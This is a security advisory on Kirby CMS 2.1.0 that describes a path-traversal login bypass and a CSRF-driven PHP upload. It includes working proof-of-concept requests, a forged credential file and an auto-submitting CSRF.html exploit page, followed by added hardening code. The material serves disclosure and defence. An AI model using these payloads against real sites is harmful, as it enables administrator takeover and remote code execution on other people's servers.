Multi-Vulnerability Analysis of Kirby CMS

Source: Internet
Author: User


Kirby CMS is an easy-to-use, easy-to-install CMS that stores all content on the file system and needs no database. It supports Markdown syntax, templates and plug-ins.

Vulnerability details

Two vulnerabilities were found in Kirby CMS:

1. Authentication bypass through path traversal

2. CSRF upload and PHP script execution

Authentication bypass through path traversal

One of the vulnerabilities in Kirby CMS allows an attacker to have files read from, and written to, locations in the hosting environment's file system that lie outside the CMS directory.

Because Kirby CMS is a file-based content management system, it also stores the authentication data in files in the accounts directory. Each user has their own password file, named kirby/site/accounts/[username].php

On the login page, this password file is read to verify the password hash. The path is built from the user-supplied login name, and it is never checked for traversal sequences such as '../' before use.

This leads to a path traversal vulnerability. In a multi-user hosting environment, an attacker who can write a file to a world-writable directory such as /tmp can use it to bypass authentication.

The vulnerable code is in the file kirby/core/user.php:

abstract class UserAbstract {

  protected $username = null;
  protected $cache    = array();
  protected $data     = null;

  public function __construct($username) {

    // the username is only lower-cased; it is never validated for path separators or '../'
    $this->username = str::lower($username);

    // check if the account file exists
    if(!file_exists($this->file())) {
      throw new Exception('The user account could not be found');
    }

    ...
  }

  // the account file path is built directly from the user-supplied username
  protected function file() {
    return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';
  }
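As an added example (not Kirby's own code), one way to harden this lookup: the username is validated against a strict allow-list, and the resolved path is additionally required to stay inside the accounts directory. The function name safeAccountFile, the $accountsRoot parameter (standing in for kirby::instance()->roots()->accounts()) and the temporary accounts directory built for the demonstration are assumptions.

```php
<?php
// Added example (not Kirby's code): hardened account-file lookup.
// $accountsRoot stands in for kirby::instance()->roots()->accounts().
function safeAccountFile(string $username, string $accountsRoot): ?string
{
    $username = strtolower($username);

    // 1. Allow-list the username: it must start with a letter or digit and may
    //    contain only [a-z0-9._-]. This alone rejects "/", "\" and "../".
    if (!preg_match('/^[a-z0-9][a-z0-9._-]{0,63}$/', $username)) {
        return null;
    }

    // 2. Defence in depth: resolve the final path and require it to remain
    //    below the accounts root, even if a symlink or ".." got through.
    $root = realpath($accountsRoot);
    if ($root === false) {
        return null;                                   // accounts directory missing
    }
    $real = realpath($root . DIRECTORY_SEPARATOR . $username . '.php');
    if ($real === false || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // no such account, or outside root
    }
    return $real;
}

// Demonstration with a constructed accounts directory under the system temp dir.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'kirby_accounts_demo';
if (!is_dir($root)) {
    mkdir($root, 0700);
}
file_put_contents(
    $root . DIRECTORY_SEPARATOR . 'victim.php',
    "<?php if(!defined('KIRBY')) exit ?>\nusername: victim\nrole: admin\n"
);

$inputs = [
    'victim',                                          // legitimate account
    '../../../../../../../../tmp/bypassauth',          // traversal used in the advisory
    urldecode('..%2F..%2F..%2F..%2Ftmp%2Fbypassauth'), // same thing as the panel receives it
    'victim/../victim',                                // traversal that still ends inside root
];
foreach ($inputs as $in) {
    $file = safeAccountFile($in, $root);
    printf("%-45s => %s\n", $in, $file === null ? 'rejected' : 'accepted: ' . $file);
}
```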


In addition, while working on the authentication bypass we found that Kirby CMS allows authentication over plain HTTP and that authenticated sessions never expire.

Proof of concept

Kirby CMS stores the credentials as a PHP file in the kirby/site/accounts directory so that the web server does not serve the file contents directly.
A credential file looks like this:

<?php if(!defined('KIRBY')) exit ?>

username: victim
email: victim@mailserver.com
password: >
  $2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC
language: en
role: admin

To bypass authentication, an attacker with an account in the same hosting environment writes a credential file of the above form, containing a password hash the attacker knows, to a public directory, for example /tmp/bypassauth.php.

Because of the path traversal vulnerability, the attacker can then log in as administrator at http://victim-server.com/kirby/panel/login with these credentials:
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout

The resulting HTTP POST request looks like this:

POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 149

username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...

This causes Kirby CMS to load the credentials from the path /sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php.

Finally, the attacker receives a response like the following, in which the panel links to the injected account:

<div class="hgroup-single-line cf">
  <h1 class="hgroup-title">
    <a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a>
  </h1>
  <div class="hgroup-options shiv-dark shiv-left">

The attacker now has administrator privileges in the Kirby CMS management panel.

CSRF upload and PHP Script Execution

Another vulnerability in Kirby CMS allows uploading PHP script files, which are normally rejected. It can only be exploited by authenticated users, but administrator permissions are not required.

Kirby CMS additionally has a CSRF (Cross-Site Request Forgery) vulnerability. If an attacker lures an authenticated user to a malicious page, the attacker can upload files using that user's session, which means an unauthenticated attacker can modify or upload content.
Chaining these two vulnerabilities allows execution of arbitrary PHP code.

PHP Script Execution

Besides the administrator, Kirby CMS also lets low-privilege users who have access to the management panel upload content. The upload function is intended for images and other media files.

Kirby CMS performs the following checks before saving an uploaded file:

  protected function checkUpload($file, $blueprint) {

    // content (text) files may not be uploaded as media
    if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {
      throw new Exception('Content files cannot be uploaded');

    // deny-list: only the literal "php" extension and the PHP MIME types are rejected
    } else if(strtolower($file->extension()) == 'php' or
              in_array($file->mime(), f::$mimes['php'])) {
      throw new Exception('PHP files cannot be uploaded');

    } else if(strtolower($file->extension()) == 'html' or
              $file->mime() == 'text/html') {
      throw new Exception('HTML files cannot be uploaded');
    ...
  }


We can see that PHP files are detected by checking whether the file extension is ".php" or whether the MIME type of the file is recognised as PHP. If one of these conditions is met, Kirby CMS rejects the upload.

Unfortunately, both checks are easily bypassed.

Many server configurations, for example on Ubuntu or Debian, treat .php, .php4 and .php5 as PHP script extensions. Renaming the malicious PHP script to .php4 or .php5 is enough to bypass the extension check. MIME type detection only requires

Because script execution is not disabled by default for the upload directory, an attacker who bypasses these checks can upload and execute arbitrary PHP scripts.
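As an added example (not Kirby's code), a replacement check that turns the deny-list into an allow-list of media types, validates every extension segment of the file name, and sniffs the file content with finfo instead of trusting the client-supplied Content-Type. The function name isUploadAllowed and the sample files written to the temp directory are constructed for the demonstration.

```php
<?php
// Added example (not Kirby's code): allow-list based upload validation.
function isUploadAllowed(string $filename, string $tmpPath): bool
{
    // Media types the panel is meant to accept; anything else is rejected, so
    // .php4/.php5/.phtml never have to be enumerated in a deny-list.
    $allowedExt  = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf'];
    $allowedMime = ['image/jpeg', 'image/png', 'image/gif', 'image/webp', 'application/pdf'];

    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2) {
        return false;                                  // no extension at all
    }
    array_shift($parts);                               // drop the base name
    // Every extension segment must be allowed: "x.php5.jpg" and "x.jpg.php4" are
    // both rejected, which matters on servers that evaluate multiple extensions.
    foreach ($parts as $ext) {
        if (!in_array($ext, $allowedExt, true)) {
            return false;
        }
    }

    // Sniff the actual bytes; the Content-Type sent by the client is ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, $allowedMime, true)) {
        return false;
    }
    // Final guard: no PHP open tag anywhere in the payload, whatever it claims to be.
    $data = file_get_contents($tmpPath);
    return stripos($data, '<?php') === false && strpos($data, '<?=') === false;
}

// Constructed samples: the advisory's payload under two names, and a minimal valid PNG.
$tmp     = sys_get_temp_dir();
$payload = "<?xml ?>\n<?php\nphpinfo();\n?>\n";
file_put_contents("$tmp/kirbyexec.php5", $payload);
file_put_contents("$tmp/kirbyexec.png", $payload);      // same bytes, innocent-looking name
$ihdr = 'IHDR' . pack('NN', 1, 1) . "\x08\x02\x00\x00\x00";
file_put_contents("$tmp/real.png",
    "\x89PNG\r\n\x1a\n" . pack('N', 13) . $ihdr . pack('N', crc32($ihdr)));

foreach (['kirbyexec.php5', 'kirbyexec.png', 'real.png'] as $name) {
    printf("%-16s %s\n", $name, isUploadAllowed($name, "$tmp/$name") ? 'allowed' : 'rejected');
}
```

Independently of the upload check, the content directory should be configured so that the web server never executes scripts from it.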

CSRF (Cross-Site Request Forgery)

Only authenticated administrator or editor users are allowed to upload media files. However, the upload function of Kirby CMS has no protection against cross-site request forgery.

Proof of concept

The two vulnerabilities above can be chained. The attacker prepares a malicious page that uploads an arbitrary PHP file and lures a user who is authenticated to Kirby CMS into visiting it.

CSRF.html file (see below).

Request sent by CSRF.html:

POST /kirby/panel/api/files/upload/about HTTP/1.1
Host: victim_kirby_server
Content-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822
Content-Length: 261
Origin: null
Cookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00...

-----------------------------4679830631250006491995140822
Content-Disposition: form-data; name="file"; filename="kirbyexec.php5"
Content-Type: application/x-php

<?xml ?>
<?php
phpinfo();
?>
-----------------------------4679830631250006491995140822--

The file is stored in the server's kirby/content/1-about directory, and requesting http://victim_kirby_server/kirby/content/1-about/kirbyexec.php5
displays the phpinfo() page.

CSRF.html

<html>
  <body onload="kirbySend()">
    <script>
      function kirbySend()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://victim_kirby_server/kirby/panel/api/files/upload/about", true);
        xhr.setRequestHeader("Accept", "application/json");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------4679830631250006491995140822");
        // the victim's Kirby session cookie is attached automatically
        xhr.withCredentials = true;
        var body = "-----------------------------4679830631250006491995140822\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"kirbyexec.php5\"\r\n" +
          "Content-Type: application/x-php\r\n" +
          "\r\n" +
          "\x3c?xml \x3e\n" +
          "\x3c?php\n" +
          "\n" +
          "phpinfo();\n" +
          "\n" +
          "?\x3e\n" +
          "\n" +
          "\n" +
          "\r\n" +
          "-----------------------------4679830631250006491995140822--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Re-submit request to Kirby" onclick="kirbySend();" />
    </form>
  </body>
</html>
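As an added example (not Kirby's code), the check the upload endpoint lacks: a per-session CSRF token compared in constant time, backed by an Origin/Referer check that rejects the "Origin: null" a cross-site page produces. The function names, the session array and the constructed requests are assumptions; victim-server.com stands in for the panel's own host.

```php
<?php
// Added example (not Kirby's code): CSRF defence for a state-changing endpoint.
// The upload endpoint accepted any request carrying a valid session cookie, and
// CSRF.html works precisely because the browser attaches that cookie for it.

// Issue one random token per session; the panel embeds it in its forms and XHR calls.
function csrfToken(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Trust the request only if it carries the session's token and, when an
// Origin/Referer header is present, that header names our own host.
function isRequestTrusted(array $session, array $headers, array $post, string $ownHost): bool
{
    $sent = $post['_csrf'] ?? ($headers['X-CSRF-Token'] ?? '');
    if (empty($session['csrf']) || !is_string($sent)
        || !hash_equals($session['csrf'], $sent)) {    // constant-time comparison
        return false;
    }
    // A cross-site XHR sends "Origin: null" or the attacker's origin; the panel's
    // own requests send our host. Some clients send neither header, which the
    // token check above already covers.
    $origin = $headers['Origin'] ?? $headers['Referer'] ?? null;
    if ($origin === null) {
        return true;
    }
    return $origin !== 'null' && parse_url($origin, PHP_URL_HOST) === $ownHost;
}

// Constructed session and requests.
$session = [];
$token   = csrfToken($session);
$requests = [
    'forged' => ['headers' => ['Origin' => 'null'], 'post' => []],            // what CSRF.html sends
    'legit'  => ['headers' => ['Origin' => 'http://victim-server.com',
                               'X-CSRF-Token' => $token], 'post' => []],      // the panel's own XHR
    'stolen' => ['headers' => ['Origin' => 'http://attacker.example',
                               'X-CSRF-Token' => $token], 'post' => []],      // right token, wrong origin
];
foreach ($requests as $label => $req) {
    printf("%-6s => %s\n", $label,
        isRequestTrusted($session, $req['headers'], $req['post'], 'victim-server.com')
            ? 'accepted' : 'rejected');
}
```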

Affected Versions

Kirby CMS version 2.1.0 and earlier versions.
